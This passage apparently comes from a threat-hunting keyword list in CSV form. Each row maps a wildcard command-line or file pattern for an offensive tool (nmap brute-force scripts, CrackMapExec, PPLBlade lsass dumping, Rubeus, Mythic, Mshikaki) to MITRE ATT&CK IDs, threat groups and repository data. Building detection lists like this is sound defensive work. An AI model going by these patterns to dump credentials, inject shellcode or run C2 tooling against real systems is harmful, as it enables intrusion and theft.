T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"* merlin.py *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"* met_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* metasploit-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* metasploit-msgrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* metasploit-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -method * -nthash *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"* Microsploit.sh*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","0","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" +"* mikrotik-routeros-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mimikittenz*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* mmouse-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mmouse-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* modbus-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --mode decrypt --dumpname *.dmp --key *","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* --mode dump --name *.exe --handle procexp --obfuscate*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* --mode dump --name lsass.exe*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* --mode proxy --ghidra *--dll *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"* mongodb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mongodb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mongodb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* monitor /interval:* /filteruser:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* moodlescan -r -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* mqtt-subscribe.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mrinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* MS15-034.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"* ms17010 -i *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"* ms17010 -n *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival 
detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"* msfdb run *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"* --msfoptions *","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"* --msf-path*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* Mshikaki.cpp*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" +"* msrpc-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mssql * -u * -p * -M met_inject*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* mssql * -u * -p * -M mssql_priv*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* mssql * -u * -p * -M web_delivery *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ms-sql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-dac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-dump-hashes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-empty-password.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-hasdbaccess.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-tables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-xp-cmdshell.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mtrace.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* murmur-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-audit.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-dump-hashes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-empty-password.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-variables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-vuln-cve2012-2122.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"* mythic start*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* 